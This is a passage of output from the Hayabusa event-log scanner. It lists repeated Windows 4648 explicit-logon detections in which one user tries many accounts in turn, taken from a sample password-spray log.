DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx -2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: 